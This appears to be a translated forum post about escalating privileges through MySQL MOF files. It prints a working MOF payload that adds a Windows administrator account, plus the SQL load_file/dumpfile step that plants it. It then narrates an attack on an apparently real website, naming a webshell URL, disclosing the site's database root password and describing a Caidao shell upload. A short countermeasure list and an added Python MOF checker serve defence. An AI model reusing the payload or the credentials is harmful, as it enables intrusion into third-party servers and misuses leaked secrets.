How to defend against the MySQL MOF extension vulnerability

Some exploit code published online:

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
    EventNamespace = "Root\\Cimv2"; Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
    Name = "consPCSV2"; ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

After connecting to the MySQL database, execute:

select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

Looking at the code above, the countermeasures follow:

1. Control MySQL user privileges; forbid functions such as "load_file" and "dumpfile"
2. Disable the "WScript.Shell" component
3. Directory permissions: remove the built-in special group CREATOR OWNER from c:/windows/system32/wbem/mof/
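As an added example (not part of the original post), a small Python checker that parses a MOF file of the shape shown above and flags the pieces of a permanent WMI event subscription that can run code: the script or command-line consumer, the WScript.Shell usage inside it, and the binding that arms it. The sample MOF, the harmless placeholder command and the function names are constructed here; a defender would run it over the contents of wbem\mof and over MOF dropped elsewhere on disk.

```python
import re
# Constructed sample in the shape described above (timer-style filter, script
# consumer using WScript.Shell, binding); the command is a harmless placeholder.
SAMPLE_MOF = r'''
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
    EventNamespace = "Root\\Cimv2"; Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
    Name = "consPCSV2"; ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"cmd.exe /c echo placeholder\")";
};
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
'''
INSTANCE_RE = re.compile(r'instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{(.*?)\};', re.S)
PROP_RE = re.compile(r'(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+|[^;]+);', re.S)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
RISKY_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}  # run code
RISKY_MARKERS = ("WScript.Shell", "ActiveXObject", "cmd.exe", "net.exe")

def _unescape(s):  # MOF string escapes: \" \\ \n \t
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)

def parse_instances(text):
    """Return [(class, alias, {prop: value})] for every 'instance of' block."""
    out = []
    for cls, alias, body in INSTANCE_RE.findall(text):
        props = {}
        for name, raw in PROP_RE.findall(body):
            parts = STRING_RE.findall(raw)  # adjacent "a" "b" literals concatenate
            props[name] = "".join(_unescape(p) for p in parts) if parts else raw.strip()
        out.append((cls, alias, props))
    return out

def audit_mof(text):
    """Flag the pieces of a permanent event subscription that can run code."""
    findings, risky_aliases = [], set()
    for cls, alias, props in parse_instances(text):
        if cls in RISKY_CONSUMERS:
            payload = props.get("ScriptText", "") + props.get("CommandLineTemplate", "")
            hit = [m for m in RISKY_MARKERS if m in payload]
            findings.append(f"{cls} '{props.get('Name')}' executes code; markers: {hit}")
            if alias:
                risky_aliases.add("$" + alias)
        elif cls == "__FilterToConsumerBinding" and props.get("Consumer") in risky_aliases:
            findings.append(f"__FilterToConsumerBinding arms {props['Consumer']} via {props.get('Filter')}")
    return findings
```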
Of course, the above is what is said online. It feels like it needs a lot of privileges, such as root, and also remote MySQL connections. I ran into it yesterday, so I'll demonstrate it for everyone.

Here's how it happened: a buddy asked a question on the forum, I took a look and found that some expert had already taken it down, saying it was done with MySQL MOF extension privilege escalation.

But as a newbie I had never heard of it, so I hurried off to look up material and study... which is where the content from the internet above came from.

Once I understood it, time to practise.

http://www.webbmw.com/config/config_ucenter.php (one-liner webshell)

$_config['db']['1']['dbhost'] = 'localhost';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'tfr226206';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'webbmw';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';

There's the root password.

So I went straight at it with Caidao.

Upload the shell first.

Since we have those accounts and so on, let's execute it.......

A small note:

Here the first execution did not succeed; reason unknown.

I wondered whether it was because the code we ran had a problem, so I went to the code I had found on wooyun.

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter {
    EventNamespace = "Root\\Cimv2"; Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer {
    Name = "consPCSV2"; ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};
instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

I put the file at C:\WINDOWS\temp\1.mof

So we change the code to execute a little:

select load_file('C:\WINDOWS\temp\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

But you'll find the account still isn't sitting there..

So I got frustrated.

So I went and executed them one by one, but when it got to the second MySQL it succeeded.........

But none of the other databases worked...

I'm really puzzled. Why exactly doesn't it succeed? Asking the experts for an answer...